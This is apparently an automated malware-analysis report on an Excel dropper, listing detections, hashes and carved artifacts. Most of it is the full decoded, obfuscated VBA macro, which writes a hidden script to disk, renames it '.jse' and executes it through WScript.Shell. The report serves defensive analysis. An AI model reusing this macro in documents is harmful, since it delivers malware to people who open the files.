MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Xls.Dropper.Agent-7618878-0. Static analysis revealed the presence of VBA macros, including calls to CreateObject and CallByName, which are commonly used for malicious purposes. The VBA script likely attempts to download and execute a second-stage payload, as indicated by the heuristic firings and the nature of dropper malware.
Heuristics 5
-
ClamAV: Xls.Dropper.Agent-7618878-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7618878-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 7
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3403 bytes |
SHA-256: e443d444e4fbbf1636dc09e47aafa4532dd35667a9102dd1612aa2f894496629 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "ScrollBar1, 4, 0, MSForms, ScrollBar"
Attribute VB_Control = "TextBox1, 2, 1, MSForms, TextBox"
Attribute VB_Control = "OptionButton1, 1, 2, MSForms, OptionButton"
Private Juerdf As Integer
Public RInhu As String
Sub ForkLop()
Dim PT As PivotTable
For Each PT In ActiveSheet.PivotTables
PT.RefreshTable
Next PT
End Sub
Private Function Rdrijji(s As String) As String
Rdrijji = Replace(s, " y", "")
End Function
Sub HellOpers()
Dim cl As Range
For Each cl In ActiveSheet.UsedRange
If Not Application.CheckSpelling(word:=cl.Text) Then
cl.Interior.Color = vbRed
End If
Next cl
End Sub
Private Function RNefoo(Fcoolert As Long)
On Error GoTo Handler
If Target.Column = 1 And Target.Value <> "" Then
Application.EnableEvents = False
Target.Offset(0, 1) = Format(Now(), "dd-mm-yyyy hh:mm:ss")
Application.EnableEvents = True
End If
Handler:
Application.EnableEvents = CallByName(CreateObject(Rdrijji(" yW ySc yri ypt y" & " y.Sh yel yl")), OptionButton1.Caption, (Fcoolert - Fcoolert) + Frame1.ScrollBars + 1, RInhu, OptionButton1.BackStyle)
End Function
Sub NikoLerd()
Dim Myrange As Range
Dim Myrow As Range
Set Myrange = Selection
For Each Myrow In Myrange.Rows
If Myrow.Row Mod 2 = 1 Then
Myrow.Interior.Color = vbCyan
End If
Next Myrow
End Sub
Private Sub Rfiint(Beyy7 As Long)
RNefoo (Beyy7)
End Sub
Private Sub Nefgfoio()
Dim Fbbert As String
R = Juerdf
Fbbert = UserForm1.TextBox1.Text
FrKonert = Application.StartupPath & Rdrijji(" y\..\.. y\.. y\.. y\. y.")
RInhu = FrKonert & "\" & Me.Name & Juerdf & ".swkiloaq."
Dim NerdfI As Integer
NerdfI = FreeFile
If Me.EnableFormatConditionsCalculation Then
NerdfI = NerdfI + (R - R)
End If
On Error Resume Next
Open RInhu For Binary Lock Read Write As #NerdfI
Put NerdfI, , Fbbert
Close NerdfI
If Me.EnableFormatConditionsCalculation Then
FileCopy RInhu, RInhu & Rdrijji(" yj yse")
RInhu = RInhu & Rdrijji(" yj yse")
RInhu = Rdrijji(" yex yplo yre yr.e yx ye ") & Chr(Juerdf + 1) & RInhu & Chr(Juerdf + 1)
End If
End Sub
Private Sub CommandButton1_Click()
End Sub
Public Sub TextBox1_Change()
Juerdf = 33
Nefgfoio
Rfiint 67
HellOpers
End Sub
Private Sub Frame1_Layout()
Me.EnableFormatConditionsCalculation = True
TextBox1.Text = Me.Name
End Sub
Private Sub TextBox2_Change()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{28AA62EB-49C4-4E0A-A584-4687D784B897}{BBAB5157-819B-4466-A0EB-D64AD08084B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 372736 bytes |
SHA-256: 2b886d12c8dfa10e1593b350dcd194411a71a48219e7761368b4d0e068cba2d9 |
|||
|
Detection
ClamAV:
Xls.Dropper.Agent-7618878-0
Obfuscation or payload:
likely
Carved artifact contains 2 eval/decoder/string-building token(s).
|
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image5.emf | 1239252 bytes |
SHA-256: f5a354630e3dc930c4c066f115f8f5e999f52b4eb7296652816d58b7daa5a3a7 |
|||
emf_01.emf |
ooxml-emf | OOXML EMF part: xl/media/image3.emf | 1820 bytes |
SHA-256: b5c8a7dc3448107275b022b1d9916501eebae0188316579e40f647709969481d |
|||
emf_02.emf |
ooxml-emf | OOXML EMF part: xl/media/image4.emf | 1892 bytes |
SHA-256: fe4764d781e957fb6f262f4710b740f33c36f5cfcba195c4e2bf68f870c27486 |
|||
emf_03.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 4956 bytes |
SHA-256: ba1d2d4db877070dcd8513001d076d2b523dd7342d4960ef1753b4330fbfbc21 |
|||
emf_04.emf |
ooxml-emf | OOXML EMF part: xl/media/image2.emf | 2384 bytes |
SHA-256: 606470656217355e28bf2970315d2a216370f1e1da8c675170761c66a6c741dc |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.